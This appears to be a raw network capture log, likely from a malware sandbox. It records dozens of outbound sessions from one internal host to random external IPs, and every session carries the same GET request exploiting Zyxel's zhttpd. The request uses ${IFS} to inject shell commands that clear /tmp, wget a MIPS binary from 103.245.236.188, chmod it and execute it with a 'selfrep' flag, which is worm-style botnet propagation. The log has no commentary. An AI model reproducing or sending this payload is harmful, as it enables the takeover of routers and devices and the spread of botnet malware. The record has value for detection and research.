                                                Jan 12, 2024 18:16:34.717477083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7271192.168.2.234928683.178.190.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717504978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7272192.168.2.2343352182.24.33.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717576981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7273192.168.2.235328067.120.0.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717603922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7274192.168.2.2358730178.13.179.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717639923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7275192.168.2.2355500153.221.52.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717694044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7276192.168.2.235162019.151.223.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717747927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7277192.168.2.236020413.75.169.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717787981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7278192.168.2.2360576148.122.41.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717828035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7279192.168.2.2354440148.40.233.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717864037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7280192.168.2.2350106186.94.185.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717897892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7281192.168.2.2359882163.222.80.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717933893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7282192.168.2.2339722153.13.15.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717984915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7283192.168.2.233925272.59.27.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718023062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7284192.168.2.2334662209.111.160.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718070030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7285192.168.2.2346458175.93.86.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718112946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7286192.168.2.2346962217.251.124.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718158960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7287192.168.2.234377213.98.13.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718208075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7288192.168.2.233498476.4.8.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718242884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7289192.168.2.2342830151.141.180.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718286991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7290192.168.2.2339956150.44.84.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718341112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7291192.168.2.235577446.222.121.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718365908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7292192.168.2.2359492106.117.61.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718374014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7293192.168.2.234327478.76.200.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718425989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7294192.168.2.2341748155.138.80.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718460083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7295192.168.2.235018238.205.136.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718508959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7296192.168.2.234907089.125.149.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718560934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7297192.168.2.2354802193.89.70.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718610048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7298192.168.2.2334010194.160.117.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718651056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7299192.168.2.2355920132.184.166.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718686104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7300192.168.2.233572893.162.20.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718736887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7301192.168.2.2360738159.72.89.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718760014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7302192.168.2.2340592113.195.231.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718782902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7303192.168.2.234459673.44.84.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718848944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7304192.168.2.2347568201.10.13.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718900919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7305192.168.2.2340694197.99.109.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718919992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7306192.168.2.2350188146.40.112.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.718977928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7307192.168.2.233376493.133.0.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719026089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7308192.168.2.2352998148.148.23.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719065905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7309192.168.2.234004886.201.81.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719099045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7310192.168.2.235014876.44.42.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719130039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7311192.168.2.2340786210.253.23.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719202995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7312192.168.2.2344250211.98.15.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719225883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7313192.168.2.2351476198.232.15.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719283104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7314192.168.2.2349586211.167.124.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719319105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7315192.168.2.235454866.12.240.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719367981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7316192.168.2.2344590139.49.121.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719398022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7317192.168.2.2341306157.111.189.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719449043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7318192.168.2.235714087.67.215.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719471931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7319192.168.2.2343504144.121.200.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719507933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7320192.168.2.2356020113.41.177.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719566107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7321192.168.2.2336974218.175.108.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719599009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7322192.168.2.2342332189.72.57.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719620943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7323192.168.2.2359012178.129.7.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719662905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7324192.168.2.233299447.42.216.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719711065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7325192.168.2.2336364135.166.75.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719748020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7326192.168.2.2349894210.180.182.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719782114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7327192.168.2.2335422208.232.58.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719810009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7328192.168.2.2348838208.40.245.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719841957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7329192.168.2.234897689.253.149.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719875097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7330192.168.2.2336326196.98.77.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719914913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7331192.168.2.2348728121.238.91.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719943047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7332192.168.2.2340382132.230.51.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.719973087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7333192.168.2.2338550134.179.239.5443
                                                TimestampBytes transferredDirectionData
